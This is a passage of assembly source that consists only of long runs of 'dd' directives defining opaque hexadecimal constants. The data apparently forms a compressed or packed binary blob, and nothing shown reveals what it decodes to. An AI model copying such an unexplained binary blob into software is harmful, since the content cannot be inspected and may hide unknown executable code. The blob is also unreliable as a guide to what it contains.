dd 73DA60B8h, 4404FF2Dh, 33031DE5h, 0AFF4C5Fh, 0D7CC9AAh
dd 0FF713CDDh, 41AA5005h, 10102702h, 86BE0BFFh, 25C90C20h
dd 5768FFB5h, 206F85B3h, 66FFD409h, 61E49FB9h, 0FFF90ECEh
dd 0C9985EDEh, 982229D9h, 0B4B0D0FFh, 17C7D7A8h, 59B3FF3Dh
dd 2EB40D81h, 0BDFF5C3Bh, 0BA6CADB7h, 0FF8320C0h, 0B3B6EDB8h
dd 0E20C9ABFh, 9A03B6FFh, 3974B1D2h, 0EAD5FF47h, 9DD277AFh
dd 0DBFF2615h, 0DC168304h, 0FF0B1273h, 3B84E363h, 6A3E9464h
dd 0A80D6DFFh, 0B7A6A5Ah, 0E40EFFCFh, 9309FF9Dh, 0FFAE27h
dd 79EB10Ah, 0FF93447Dh, 0A3D2F00Fh, 0F2688708h, 0FE1E01FFh
dd 5D6906C2h, 0F762FF57h, 806567CBh, 6CFF3671h, 6B06E719h
dd 0FF1B766Eh, 2BE0FED4h, 7A5A89D3h, 0CC10DAFFh, 6F67DD4Ah
dd 0F9B9FFDFh, 8EBEEFF9h, 0B7FABE43h, 0B08ED517h, 0D6A342DFh
dd 93FF7ED6h, 0C2C4A1D1h, 0FF5238D8h, 0F14FDFF2h, 67D1BB67h
dd 0A6BC57FFh, 3FB506DDh, 0B236FF4Bh, 0D2BDA48h, 1BF84CD8h
dd 4AF6AF0Ah, 7A608B37h, 0C34104FFh, 55DF60EFh, 0A867FFDFh
dd 316E8EEFh, 69FFBE79h, 61B38C46h, 0FF831ACBh, 0D2A0BC66h
dd 0E236256Fh, 955268FFh, 3CC0C77h, 0BB0BFF47h, 220216B9h
dd 5FF262Fh, 0BA3BBE55h, 0FF0B28C5h, 5A92B2BDh, 6A042BB4h
dd 0A75CB3FFh, 31C2D7FFh, 0B5D0FFCFh, 2CD99E8Bh, 0DEFFAE1Dh
dd 64C2B05Bh, 0F8F2269Bh, 0A39CEC63h, 93ABB76Ah, 0A902FF6Dh
dd 3F9C0906h, 0EBFF0E36h, 72076785h, 0FF005713h, 0BF4A8205h
dd 0B87A1495h, 2BAEE2FFh, 1B387BB1h, 9B0CFFB6h, 0D92D28Eh
dd 0E5FFD5BEh, 7CDCEFB7h, 0FFDBDF21h, 0D3D2D40Bh, 0D4E24286h
dd 0B3F8F1FFh, 836E68DDh, 0CD1FFFDAh, 5B81BE16h, 0F6FFB926h
dd 6FB077E1h, 0E3B74777h, 7D5AE618h, 0F6A707Fh, 0FF3BCAFFh
dd 0B5C6606h, 9EFF1101h, 0FE69D95Bh, 0D3F862AEh, 37616BFFh
dd 0FF166CC4h, 0A00AE278h, 0D70DD2EEh, 48354FFh, 3B3C24Eh
dd 2661FF39h, 16F7A767h, 4DFFD060h, 0DB496947h, 0FF3E6E77h
dd 0AED16A4Ah, 0D9D65ADCh, 0DF0B66FFh, 0D83BF040h, 0AE53FF37h
dd 9EC5A9BCh, 7FEBDEBBh, 7F4CB2CFh, 1C30B5FFh, 0BDFFBDF2h
dd 0CABAC28Ah, 0FFB39330h, 0B4A3A653h, 0D0360524h, 693BAFFh
dd 5729CDD7h, 0BF54FFDEh, 2E23D967h, 0B3FF667Ah, 0C4614AB8h
dd 0FF681B02h, 6F2B945Dh, 0BBE372Ah, 8EA1B4FFh, 0DF1BC30Ch
dd 8D5AFA05h, 372D02EFh, 0FE83C802h, 3980FFC8h, 0D0F7400h
dd 32D0FFF2h, 8E8C111h, 97C50433h, 0EC9ABF41h, 5F5B5A59h
dd 63C35ED6h, 1618530h, 0F0C1F5h, 35A1B7F4h, 5E74CF26h
dd 0B7730CC7h, 0AC14A86Eh, 3C98C33Bh, 1D5B2B32h, 9E2D7093h
dd 0E30CFFFEh, 20FB0F76h, 14270731h, 4CA6BD7h, 5F77E07Bh
dd 0EC811913h, 486C0A5Ah, 30D4FB1Eh, 0F0C44421h, 413DD32Eh
dd 825283B6h, 0D7F00374h, 0E7215A2Dh, 0C0C85C1Dh, 1F8F6D0Dh
dd 9A34BD9Bh, 4BC3429h, 988E7C4h, 2620812Ah, 0DE52CF43h
dd 26A6B77Ch, 0E1161A6Bh, 0F2B214B1h, 0B1B86F1Eh, 8C9E687Dh
dd 0DF09790Eh, 0EA2223E8h, 1A1DF843h, 9E7158Ch, 22173078h
dd 7DD0D093h, 9AF764C6h, 0D4412403h, 1E1E0496h, 0EA0EC686h
dd 0E010940Ch, 590BEC02h, 0E2A37F7h, 50B1B828h, 6662B31Ch
dd 3DA86BDDh, 8B176FA5h, 5A160BD4h, 19BABC58h, 0A53ED900h
dd 4D09A836h, 0F798090Ah, 0B45123EDh, 359F28C4h, 12053785h
dd 780E5BDEh, 45A9EFE6h, 555A0FADh, 84831BDDh, 6AA7C50h
dd 0E703883Fh, 7BD7A3FEh, 4586EE3Eh, 6E2408EBh, 6C3D31ECh
dd 389B6436h, 0C512609h, 977F1083h, 0B2E6C703h, 51DF83AFh
dd 6F4209ECh, 836389E6h, 2F12690Eh, 0D409F66Fh, 7181036Ah
dd 6C192A8Ch, 48375B3Ch, 0E9018ABh, 3ECB5C1Bh, 26608F70h
dd 0F5EF8548h, 0CBD803F6h, 0C33018C9h, 0A7B2019Fh, 6BD712DEh
dd 2215B40h, 3CD542D9h, 6CDBCFC4h, 0C20B9AAAh, 60DD7468h
dd 309DD43h, 0E4321CCEh, 0F1353DA1h, 31B0ED6h, 0FB5B31E2h
dd 9D0C1997h, 0DA95642h, 6D67A806h, 0BB0A306Bh, 148B0B03h
dd 0EC10EFADh, 9551C58Ah, 9DF6C13Dh, 52F8B2DCh, 0B04B036Ah
dd 99C0963h, 97E3632h, 0C29FED4Dh, 64D993C1h, 0E78FD8D5h
dd 0AD6C0D6Ch, 9B9C1A9Dh, 6F6BF48Eh, 0EFFC0704h, 27501763h
dd 1B67BA59h, 2D16DEC2h, 0A2CC87D7h, 4D69EB3Fh, 5D5E52B8h
dd 1B4A9350h, 8CE75867h, 21C08B6Fh, 610FEE09h, 3611B703h
dd 0FB8BC07Eh, 458E3A25h, 7DD2F78Eh, 0EE646CE3h, 70E06C2Fh
dd 0D21D9F6h, 233D0436h
dd 3258F73Dh, 1A567B7Eh, 751B52AAh, 0E925C198h, 0D2C77D86h
dd 3ED50033h, 30A18A80h, 1B432B15h, 0E69B467Bh, 80917504h
dd 60F74D27h, 128DDBE2h, 72D8617h, 724A0FC3h, 5A66A5C6h
dd 1B63FBBBh, 27C60E63h, 0BFF7856Bh, 0DE6F03F0h, 308DDBF9h
dd 0D98330B3h, 60583B03h, 632EF1CFh, 0EE67E92Bh, 0F9D0DBBh
dd 0F1C119E1h, 6BF43B99h, 0DC6AA06h, 6C9B12D6h, 32FA58C5h
dd 43C1D7AEh, 2EBBDABCh, 5A802EEh, 0E12BAA8h, 0BBD08421h
dd 1C0E070Fh, 0E658263Eh, 4E764208h, 93844D4Ch, 83675209h
dd 3ED6B264h, 18935AF0h, 80C3712h, 6DA35BA7h, 80422F41h
dd 0BDFF7AC5h, 0FF1E854Ah, 8700E34Fh, 80BE0878h, 0ECB0F589h
dd 29769CD6h, 83157BC6h, 6151A97Dh, 0CE4CEA2Dh, 0E7C1A28Bh
dd 67681FBDh, 8B6714B7h, 0DBEB4781h, 0ACA0036Dh, 6D187966h
dd 0A3C3B96Dh, 27B569F6h, 0A9602634h, 0FA720EDEh, 0C9F07820h
dd 4610CC36h, 207A2017h, 6B08BBB5h, 51EFF925h, 0CC7C6732h
dd 0BED83260h, 7D06D20Dh, 967E497Ch, 196B4402h, 0C65FFBBh
dd 0C966181Bh, 715484F9h, 0A4DA06F8h, 197692E8h, 0B7DDE3ADh
dd 3D4EA93Bh, 8C493583h, 0F49B4D84h, 75B03D17h, 5BE803B9h
dd 9DA3C277h, 4DDFDAC6h, 98F3824Ch, 3D9E5B93h, 8A86086Eh
dd 0C3B21AC9h, 43346043h, 0BE52BECCh, 0FCDAFA3Ah, 196B54C2h
dd 0C6E50EB9h, 54CF800Eh, 0D63DA69h, 26DA6787h, 12E7D8DBh
dd 4B9782F6h, 0D303F6E9h, 0F704AC50h, 5AC75ECEh, 0DC74ABC3h
dd 0B0DF8901h, 67DBDh, 0A5DD4E58h, 216F410Eh, 6F436514h
dd 6FE84D04h, 0F67C7C7Dh, 0F60E5765h, 49872FBCh, 1B937030h
dd 4C025826h, 4ECD0662h, 0AB9B726Fh, 166347F0h, 3C82497Ah
dd 161F7331h, 7002135h, 1D8EB84h, 67832F6Ah, 6765025Bh
dd 638470DDh, 0F47589h, 929BAB92h, 1F600F01h, 5D7737A4h
dd 30B04D3Dh, 6B10176h, 3E2A87ECh, 0DA0B0396h, 67F55E5Dh
dd 0FBD650Eh, 0A80EB53Fh, 5AAE9062h, 0EE9201D5h, 0E282184Fh
dd 0C2B2AE5Dh, 27DA928Ch, 0FED52430h, 0F6F3D67Eh, 0FB00F608h
dd 0EA7B3D25h, 0B5760CF8h, 3FBA69Fh, 292651A3h, 43C1C718h
dd 0C5C1F080h, 1EAC41B2h, 0DFA79A02h, 0F17BD22Dh, 75C78Bh
dd 0FAFDD8E7h, 7A9553F0h, 62DDFB84h, 4161D003h, 866049C3h
dd 0DD35C130h, 0EEC2FFDBh, 78B05004h, 8C3A18B2h, 8925900Eh
dd 0B1091BDEh, 36780978h, 0F90D549Bh, 0FDF80D8Ch, 0BBCC3E80h
dd 143C3B10h, 0ED7CFFA3h, 62EC531Bh, 62A19F4Bh, 0FDF7C6F3h
dd 3932AC6h, 963090Ch, 6FD3087Bh, 1241B137h, 98496E80h
dd 381AA081h, 7C210E37h, 0C42F7520h, 8900BD61h, 0E51E8E00h
dd 16EB7A1Eh, 0B17203A3h, 7ACED28h, 66E98010h, 0ACBE48BDh
dd 3619EB1Fh, 8DC67203h, 10BEB2E2h, 0B65D107Dh, 0D8F35917h
dd 5D3C114Bh, 8016F3C1h, 0C6111B5Ah, 0D09BBE8h, 72FD656Bh
dd 336C656Eh, 891B9C32h, 591EF412h, 62E7B0E4h, 440B101Bh
dd 5BD65FB8h, 82453B2Ch, 0B815DDE2h, 28ADF65Ch, 0BEAE7B29h
dd 4E0DA02Dh, 0B0B00A83h, 24CBC8E2h, 0AE06FF81h, 17DD0314h
dd 4B6204Fh, 91C9A83h, 4919302Ch, 0BB52BEC7h, 6137504Fh
dd 0C5C9D826h, 62757822h, 0C14B72CEh, 0DEF883A0h, 11098C2Dh
dd 469BD7E8h, 0B32165C4h, 0D5F0FC6h, 3703BA69h, 94F6780Fh
dd 4B2E749h, 0CB5E6239h, 2169DB63h, 3FDBE1EFh, 887708B5h
dd 495F5BCDh, 1243262Ch, 0C2F262D1h, 0D746CACh, 5D87FFFFh
dd 0D923C581h, 0DEB40012h, 0A71E4FC8h, 6F0EC61Eh, 0BEF2BB3h
dd 0B013EB3Fh, 1C3D72DAh, 0A503B1B9h, 0E3D98E18h, 9D9368Eh
dd 0FD83454Dh, 0A1796571h, 0C3BA0E49h, 0E7154F86h, 348D5D6Eh
dd 0CD33B0EFh, 9783BD89h, 743D4740h, 769051ABh, 0B094C3Dh
dd 399D30ACh, 0C403D617h, 85B1353Dh, 4C7FDEEEh, 0E8741D1Eh
dd 5F411A21h, 0F7DDECA1h, 0D02500F3h, 0A72C24C5h, 78584D61h
dd 976F6EEEh, 53BC8123h, 0D4311D16h, 0B0A39319h, 0B610D03Ah
dd 9DE80336h, 0FECFF731h, 3BB8D18Bh, 3B4B9B56h, 4A5B0412h
dd 2658A8E1h, 9712C366h, 6FEAAF1Eh, 0E96A6E03h, 5F00D6C2h
dd 1620A30Ch, 0A82F5D2h, 0DA8447B3h, 90680C9Eh, 9DB08385h
dd 0FCF461C9h, 1DCEF7A3h, 248C597Dh, 0C2452CBh, 0DCB67AFBh
dd 6781BCA7h, 64FF77E9h, 21896491h, 0C6014AE9h, 18640000h
dd 0EE371DBBh, 7B587746h, 0A2179324h, 6011B116h, 0D9E7DE6Ch
dd 0F746FA07h, 2882CC74h, 3E1B538Ch, 47CCAD18h, 4A7134E1h
dd 661931FAh, 51605DDh, 26E0A141h, 1D3C7569h, 0AF75D377h
dd 3242F52h, 47842DA6h, 499638E5h, 35CCAB22h, 17D38701h
dd 5C1FBA41h, 0D7F01218h, 1E2C5C0Dh, 8B72E5E7h, 1CA2EC21h
dd 54C24260h, 2BF1F858h, 6978E9C9h, 689638FBh, 0C9C1610Eh
dd 0D7F7A5B0h, 8BDCD4D6h, 5E776B1Fh, 0E9D90D0Bh, 8C24C31Ah
dd 15B4C86Dh, 746D11ECh, 3AB46B39h, 30CA6705h, 3FB61363h
dd 0E231FF64h, 0FCFE4DE9h, 59AB0FD1h, 0F663BD21h, 0E8127FBAh
dd 8E76809Eh, 7FCEA45h, 46EB1B48h, 0B3832565h, 6EAB18D4h
dd 0C7B6A68Eh, 1A7C0FD9h, 0DD838434h, 1F0D6346h, 0ADB1EA61h
dd 0A3761D57h, 341825E4h, 0E7809F6Dh, 3E593062h, 0FB7A56EFh
dd 9D0CE2BAh, 35B1F90h, 2A57B172h, 96CCB78Ah, 0D6C06B52h
dd 0D6D4868Fh, 471863D1h, 0C1F9245h, 96B1FBDCh, 23F6390Ch
dd 9A228DF0h, 0A2DDF831h, 0DFF5BE2h, 2375C383h, 82B8E8F6h
dd 0F74C1623h, 1D6598Dh, 0BDDF58Eh, 1A7FCDBAh, 0EF9BE981h
dd 9309577h, 0F181F3FDh, 77C255DEh, 2A09578Eh, 9524C8B6h
dd 15FB5415h, 6D7CC832h, 0F3FB0413h, 881FE7C1h, 3C017B34h
dd 0F2FB1443h, 7842F348h, 6DE083F0h, 0BF48244Ah, 0F2AC7551h
dd 0D3B9F681h, 4D0EBF70h, 77D05A26h, 38A6CDBh, 0BAD8FFE9h
dd 78D079C7h, 2BB2745h, 0F63FA90Fh, 397A4078h, 99AEE708h
dd 1A160AB7h, 0BAB5F766h, 0BA1079C9h, 0FDEF71Dh, 0DF247132h
dd 0DC42BE04h, 79C8FBBAh, 797AD1h, 55EE807Eh, 9C67595h
dd 0F71B767Bh, 2DB71372h, 0C1D153BBh, 397978D8h, 0F618C176h
dd 27CB8487h, 35EC1D3Fh, 43E2BD95h, 87574478h, 12635817h
dd 0DEFB5CEh, 427841D4h, 87A7ADDh, 0AD1663CDh, 79C6BA3Fh
dd 79C5BAFFh, 7A4A7849h, 0AD18757Bh, 4A8547BDh, 1B1D8D2Fh
dd 767B349Eh, 0F07616EDh, 456D0BBFh, 0EC7A4678h, 97C5BAE3h
dd 1B525AECh, 0F70D8016h, 5B089DCFh, 0DF3C4172h, 0D20D701Bh
dd 0B7951A67h, 5B103CFh, 4E6A156Fh, 5396345h, 0B7BEC77Bh
dd 6CBCC3BAh, 6713896Ch, 298EED03h, 90D800BCh, 18D810A7h
dd 0EBC6365Eh, 0A55C0B21h, 1B9F0DEBh, 6E06C719h, 0DE1703DDh
dd 6EC57E83h, 0E6C48403h, 3EEC0627h, 0B0672422h, 0BAC0D57Fh
dd 957D0DCAh, 29FAFDD8h, 55FF1685h, 0A91FAEAh, 637F9B51h
dd 8B623925h, 0C4BAD2DDh, 13DE5EF6h, 7B5E5536h, 7B2CFF3Ch
dd 12180F9Ch, 7A4F9118h, 0EFB1FB61h, 0EDCC930Eh, 49E6215h
dd 0F071C1EFh, 0C1C56658h, 0D82B198h, 783DEE9Fh, 5C7A3EECh
dd 3B09640Eh, 19A21D7h, 13CE2535h, 1C10B109h, 173B739Eh
dd 6E3C7A38h, 0EBF9DB12h, 7B590F16h, 1BBD74BDh, 9D83B19h
dd 0BAF33C2h, 0FEA52670h, 48784788h, 5203781Fh, 933D3675h
dd 0A362F51Ah, 0D3311DBh, 9F315C19h, 51FAD275h, 0DB3A71EEh
dd 1878F67Dh, 361E96D5h, 783EB84Eh, 0EB8957D4h, 70033031h
dd 0EBEF3F23h, 0A5DE84A8h
dd 47EC6243h, 46C2A24h, 0EF2E4383h, 0F68AA302h, 0AAA3A578h
dd 0A6343618h, 1E27664Ch, 6DE3D80Ah, 0D741DF39h, 0BA0F6FF4h
dd 690EB2FDh, 476FD730h, 0CA8D7D2Eh, 0E1140E8Dh, 34C7AE33h
dd 3AE6C6Eh, 0B31669B1h, 931AB737h, 0ADDBC13h, 0B3B71EB8h
dd 0E86090CFh, 307788D9h, 787E836Bh, 7139FAFCh, 25797957h
dd 5C418426h, 1640DE7Bh, 88ED35D5h, 1A93E957h, 0C63D64F1h
dd 0A51D30F3h, 25CC42D6h, 0B07543F6h, 63125B17h, 0CFB68937h
dd 72341149h, 674A9293h, 0E3A4FC9Eh, 0DF143791h, 48E73078h
dd 0B83754FBh, 34F5D31h, 0D2483404h, 649FECA6h, 0F8B9612Ah
dd 0D9126B06h, 10DB83DEh, 0B77B3F1Ch, 7B04D4E9h, 1AF3460Eh
dd 25FA151Bh, 0B6A5098Bh, 295DF686h, 0C1BCFB2Fh, 58AD32DAh
dd 5B2DFA03h, 0FB8ABC55h, 0C2046D36h, 62E476EAh, 0D52C07Bh
dd 3E3DA41Bh, 70E1B291h, 0BA3FECFEh, 133279CAh, 0BBDB7DD9h
dd 98D82C21h, 0CDC21598h, 261F7B51h, 0AF491B0Dh, 27C53D06h
dd 0F25540BDh, 0B7178D9Ah, 0DE66F29Fh, 0CABAC25Bh, 20605DCAh
dd 840CB102h, 0B61AF0D8h, 1295027Bh, 0D0453A1Ah, 6C30FBh
dd 419F0E26h, 900DA4B1h, 3D66D4Fh, 8CF8B4C2h, 0CAF9901Fh
dd 931D76B1h, 9ACDDD8Bh, 74196A21h, 0E741F1F6h, 5A57371Ah
dd 150B17A7h, 0B7C8EF78h, 77A7363Ah, 1D7BB1CFh, 98ABB684h
dd 0B3574970h, 3FDBDAAFh, 0BC9803A0h, 111F2F3Dh, 8C9661C6h
dd 2D4F7F46h, 7B374751h, 5A17B9B5h, 0B427136Fh, 391A03C8h
dd 0B6E003DDh, 9397238Dh, 6509804Bh, 0DEAD5FC0h, 4CCEE304h
dd 0F6C0A8E3h, 0F10D386Dh, 83FE4F47h, 0C6F0842h, 0FC16E39h
dd 0D756781h, 1168879Bh, 0FF288667h, 51234F94h, 0C38AC706h
dd 8DF91B75h, 5D930F18h, 780978A2h, 3B471BE0h, 496F0753h
dd 75E64793h, 8A3B8628h, 8C158703h, 41B13896h, 0BC0D8E41h
dd 6055D57Dh, 63548792h, 6C3B6E20h, 0D6F97BDh, 0FD14D787h
dd 0B027D691h, 78F63A6Ch, 0A9350D70h, 3CE9586h, 1A3098DEh
dd 0DD85FB4Fh, 23807B7Eh, 451B23E0h, 0F7BE26A3h, 11C64A2Dh
dd 87534D0Dh, 0C2D5B12h, 4F4B1677h, 5138FD4Fh, 0FB518F4h
dd 0A844C58Eh, 27F646DEh, 1304DE2Ch, 0B60C348Eh, 264EE33Bh
dd 10FA04ADh, 43A8C2F7h, 1D3166DBh, 0B31A61B1h, 0B3D69790h
dd 6B61AF8Dh, 6C6B29C7h, 60039217h, 0EAB0D881h, 0EC5134FEh
dd 0DE2B42DFh, 0B7076D68h, 0BB197133h, 3BBB95F0h, 6F519730h
dd 96C0A62Eh, 26CFE2CEh, 0DC06D2A7h, 767981B8h, 3129932Ah
dd 0C9FD83B4h, 0FC681F7Bh, 79C5BA3Ah, 66811221h, 0BD14DF1Dh
dd 0CA40A72Dh, 0D22A6F6h, 84B64EFh, 17E93B83h, 58800520h
dd 72E77675h, 951C1F7Ch, 7809FA4Fh, 7729DE04h, 0C333B0A3h
dd 0BCC05AD9h, 0DBAD4C2h, 670D8C0Eh, 3D6C3A09h, 0ABB71BFBh
dd 4E42E038h, 9E12E8EAh, 251F6CF1h, 0BCF28779h, 11757908h
dd 7C7C9DC9h, 5837C583h, 438AF63Bh, 6A3115EEh, 0F016B29Fh
dd 0B46317A2h, 2E643DCBh, 1DAF25D6h, 23DEFE33h, 0B8BD9E5Eh
dd 9A7B27DEh, 0DF622685h, 1C5F9F5Ch, 79FCFA62h, 0B80819BAh
dd 16F50AF1h, 0B4936478h, 701D4912h, 0A6B09725h, 0E79616Bh
dd 4ED0CF95h, 0E83B11Eh, 0BC32B3BFh, 42216EA7h, 884EE748h
dd 4CC21BC2h, 261327C9h, 6C43BCB0h, 0D0FFCC7h, 5A8F1F29h
dd 6CEC990Fh, 4E4AC34Eh, 3BEF04DDh, 0D86C6F35h, 0CBCF88B9h
dd 3DA416BBh, 0D6AD81F9h, 313F6519h, 6E5E88F9h, 0B07378A6h
dd 216C59EDh, 6F545D83h, 40DBFC10h, 63E5650Fh, 91082327h
dd 59FE9435h, 79C7BADCh, 6025DC0Ch, 361EECBAh, 499A9811h
dd 8F1BACB3h, 1DF2747Eh, 1C32BDEEh, 94D17E22h, 0B27979F4h
dd 32E00243h, 420109CAh, 29EAC699h, 4497BCC6h, 7AE1321Bh
dd 0A26F9FAAh, 48C41663h, 8ED7304Fh, 0C6BA6CCAh, 69121A14h
dd 0C4B81D6Ch, 0DB14AA83h, 6A0B556Bh, 436CD217h, 0F6106D28h
dd 0EE034A74h, 0F6F7CDADh, 7978C9D2h, 7C79727Ah, 5D0C31B1h
dd 78BA0148h, 0C6B05A23h, 0C3609B6h, 0BD410D7Ah, 0D550C424h
dd 0B7E808B9h, 94AE127Bh, 2D3AAC11h, 5A475698h, 306179C4h
dd 0DBC64237h, 0DBA22CCBh, 0B0DC03Eh, 36CACFFh, 50D27739h
dd 0D8291877h, 39369778h, 19BE91Dh, 0B74D9608h, 75C65003h
dd 40618707h, 0D8A28C2h, 0AA0D8DA3h, 0D7BAA99Fh, 760E6344h
dd 8F1DE546h, 0D827F393h, 0D91A3A1Dh, 0FE97C22h, 2E2C11DEh
dd 0DE1202BFh, 75F8D20Ah, 0E989F6C1h, 0C9722698h, 405184E4h
dd 0F4F58730h, 0C9C6086Eh, 9738230Ch, 3759BC3h, 0B7742515h
dd 0A42E0C75h, 0F2D8B3FCh, 1F16E20h, 44936634h, 46CB86E9h
dd 1BC22D0Fh, 0CE3CDCCEh, 0FEAEB90Dh, 570681EDh, 3ABBEC04h
dd 716C171Ch, 9779B8Ah, 1ADDFBD3h, 1263ED34h, 0D75E6013h
dd 4ED37544h, 0D41BA734h, 72D006D6h, 0C67F989Eh, 4101C8FAh
dd 9BB0ED9Bh, 2077F911h, 0E63169C9h, 0FBD61B21h, 186C5CA5h
dd 8A8DBCBh, 0D83F47CEh, 0DED9272Ch, 9573631h, 0EF9E814Dh
dd 0CA171828h, 60B1AB78h, 1BD84EE1h, 12476CB6h, 0E1162DCCh
dd 0B909F98Fh, 55FF3437h, 6C993282h, 0BCA773F5h, 84851637h
dd 0E9751D50h, 23610E09h, 5EABBC3Eh, 0A4E16310h, 84E52600h
dd 0EDD3B56h, 8690E01Ah, 362F13E9h, 5BF0BEAh, 0B7239F5Dh
dd 8CB248C4h, 970C3DBAh, 9E10DB03h, 0FDBB69F4h, 8DFAC77Ch
dd 0BF9FD713h, 74904724h, 5425EF26h, 0BB9209B1h, 9B84C26Ch
dd 0CA19668Dh, 0C6B9B4AEh, 4DEADC1Dh, 0EE2C93BAh, 0D15BDF56h
dd 8EEDA138h, 989D075Ch, 1B0577F9h, 0B9F66FEAh, 86BE6BD2h
dd 9FA2768Ch, 893AF055h, 0BD69D2ECh, 4F101B81h, 4D1E5106h
dd 954F2C96h, 0CA68D798h, 6C02247Bh, 36F655D3h, 0A84CF3D3h
dd 4BD49121h, 0ECE2AE81h, 9AD96C3Ch, 71021FD5h, 0BD845575h
dd 0C420900Dh, 9BFB51C1h, 798CE874h, 4F811A7Fh, 2F983BAh
dd 0FB867684h, 6C974F4Ch, 6C6AF2B2h, 18981F87h, 90BD2F49h
dd 0DA4C7D09h, 242F2693h, 0E046A7D9h, 973976EDh, 3D156F0Ah
dd 9CD20BB8h, 9D80232h, 82D25DCFh, 655F44F7h, 0F2E3048Dh
dd 0FD9606C2h, 0DF1D4783h, 4B313D60h, 90986F0h, 0E3A81EDh
dd 3B4E8488h, 41EC04B4h, 4F4B98EEh, 8483D444h, 63B12407h
dd 2ED9604Ah, 0A92C24AAh, 0B2D10D5Bh, 64671177h, 6BF6EEF8h
dd 4A3179FEh, 0B31418B1h, 0E2DF267Fh, 2373122Eh, 73912C5h
dd 0C6FA64A2h, 0DC7D6D61h, 4BC1704h, 1646BCE1h, 0C4BF4BB4h
dd 0B0A502DDh, 6219097Ch, 7E160330h, 8480AD87h, 0E2463F40h
dd 6F212974h, 364FE850h, 0FAA36E48h, 0CC518851h, 225CB29Fh
dd 56C224EAh, 5560C89h, 9C61DB8h, 0FB3D5612h, 3E8C2992h
dd 0ECC525AEh, 69110F5Dh, 601BE07h, 813D70A5h, 0A411B1E9h
dd 4CBE5B59h, 12C6A749h, 0DCFC3F8h, 0A7B2BC69h, 9E2B6C29h
dd 987BD118h, 6F1912CFh, 9D0EF938h, 1203CBB7h, 5BC12E89h
dd 96116D29h, 6C7932A1h, 6998095Eh, 0A2F69AA4h, 8F360E86h
dd 63AE6D83h, 1C7BE20Dh, 7A3EEF63h, 40239E52h, 0C034BD2Dh
dd 92930FA7h, 619E1045h, 12DCD286h, 141986A5h, 0F1407060h
dd 0AE58EAC0h, 2E0304DDh, 0BD920F7Dh, 0AEDECD2Bh, 5B200DD1h
dd 38A3E008h, 45CE3F68h, 0D1C2F875h, 4F14B0C0h, 0E0ECF6F2h
dd 92797972h, 0D8C52255h, 4F8D532Dh, 83533133h, 1D96F65Ch
dd 4C86DF74h, 619C03EBh, 0E8E15ECh, 0B26DB3C6h, 0A56C6AB6h
dd 0D5DAF698h, 9E0D7D49h
dd 3E37D6B9h, 24A1361Ah, 3C9F6E4Dh, 0AB559257h, 0FADFBEECh
dd 0F130ED78h, 9FD004E6h, 7744BD04h, 32D08C9Fh, 81C9255Dh
dd 4B76E237h, 0CE1C70CBh, 6AF7944Dh, 0E7ADD391h, 0F7984FC4h
dd 4DEC9ECBh, 0FB084A2Ch, 1BCEDC2Fh, 3343FD18h, 807321B2h
dd 1F159446h, 0B1DAF859h, 77BB522Dh, 0FFABF03Fh, 0FB6CC71Bh
dd 45B3F8B2h, 0D2F8C8FFh, 425EEE84h, 47C7766Fh, 900DDD7Ah
dd 63B24BBAh, 0CC7AD0FEh, 0A88FB790h, 0CFFA2DFEh, 81CE3718h
dd 0AB68F8C8h, 9B80CFF9h, 0DBF94964h, 0DA1D7FC7h, 0C1810C6Eh
dd 0BAB7470Dh, 0B7F08906h, 0B0A921B7h, 0C7F223FFh, 0F167B1BAh
dd 0B9537763h, 487733C7h, 0FE3930F2h, 80C7B290h, 0F8B1F0A2h
dd 55EF4644h, 6109FA37h, 23BD49FFh, 2C522825h, 0A160FFB0h
dd 0C12DA42Dh, 34FF325Ah, 7B413633h, 0FF2D16F3h, 87D7D23h
dd 81828028h, 875384FFh, 3183E4A1h, 0EB4DFF8Bh, 0EF518F35h
dd 65FF9339h, 0DB977D44h, 0FC5C1274h, 88725C11h, 0D10B5A5Fh
dd 6664FF8Ch, 6D136865h, 5FFF4825h, 6F706E96h, 0FF756672h
dd 0EE71520Fh, 0A47AED7Ah, 82C066FFh, 0C1BF6720h, 0E4C3FFC4h
dd 0C623E4CAh, 42E2CB3Fh, 125F23CBh, 0D5BBBBB5h, 0BD3F3CFFh
dd 9CD9D5A8h, 9DCBFFDCh, 744DA1C7h, 1FFFA6CBh, 0A9D2EBF7h
dd 0FF6A8D07h, 0D7B0D9EBh, 0B3B4B1AFh, 74FC04FFh, 0B9A1AE93h
dd 0FDFEFFFBh, 5D1E04C4h, 0B2FF4400h, 7B0A7C05h, 0FE819B0Ah
dd 5C0D840Dh, 252813B9h, 1816FF44h, 0DDC41A17h, 19FF7A37h
dd 0C520E107h, 0E0E60F21h, 0DFE71726h, 6DEC990Ch, 76F2FF18h
dd 0F3F11954h, 0BAFFF5F6h, 0F8D5963Ch, 0FF0240E6h, 413FE7A0h
dd 4C0D4344h, 65A304D6h, 4DD628B7h, 12F850FFh, 7253544Eh
dd 40B8FF1Eh, 524F50A1h, 0A4FF2045h, 21496491h, 0FF252623h
dd 5C62C42h, 92D5628h, 59A526FFh, 1D216233h, 3238FF38h
dd 407E2413h, 82FF28DEh, 832C3A29h, 0FFAF9970h, 0DA698A2Fh
dd 8D8B33EAh, 0CD8F90FFh, 92EFB096h, 0B99AA580h, 205E84FFh
dd 105F0D3Eh, 6B22A35Fh, 6A906678h, 6E9440DFh, 0AEFF4E30h
dd 73996F5Bh, 425DD2CEh, 67F2FF8Ch, 633F7CC4h, 0BFBFFFFBh
dd 88C66CC2h, 0CAFF7026h, 0CE742A8Ch, 0F6782E90h, 0FB64CACFh
dd 3597FCFFh, 0BFDAD8C0h, 7CF99F47h, 0A4C9F09Bh, 532E9029h
dd 6AB773AAh, 0AEFFABA9h, 6EB694ADh, 0FF9EA88Dh, 2D207CB8h
dd 0CB930B9h, 0AB3BFFh, 0EF8804AAh, 8C08FFAEh, 80097D49h
dd 0B5FF7409h, 0D3E4B410h, 0FF9A16FCh, 0F317002Dh, 0C599CF1h
dd 0E208DEFFh, 0DD090366h, 0E5E6FFE3h, 0E9E7930Dh, 0E8FF14ECh
dd 19EFF0EDh, 0FFF428F3h, 0F86DF86Eh, 693EE46Ah, 42E85DFFh
dd 46EC4CC2h, 0F0A6FF08h, 0F447874Ah, 0AEFF104Eh, 0F94F428Eh
dd 0FFB31553h, 5758563Eh, 771DB25Ah, 4759BAFFh, 4CF07021h
dd 28FF6F24h, 0C5FC2B26h, 2F552708h, 0FF27B3h, 0D1FF5027h
dd 3058127h, 0FF8635C1h, 8A87852Dh, 0AA90E289h, 378CE9FFh
dd 9394918Fh, 545CF709h, 0FFFF8EF3h, 5DA965E4h, 0FF8C6461h
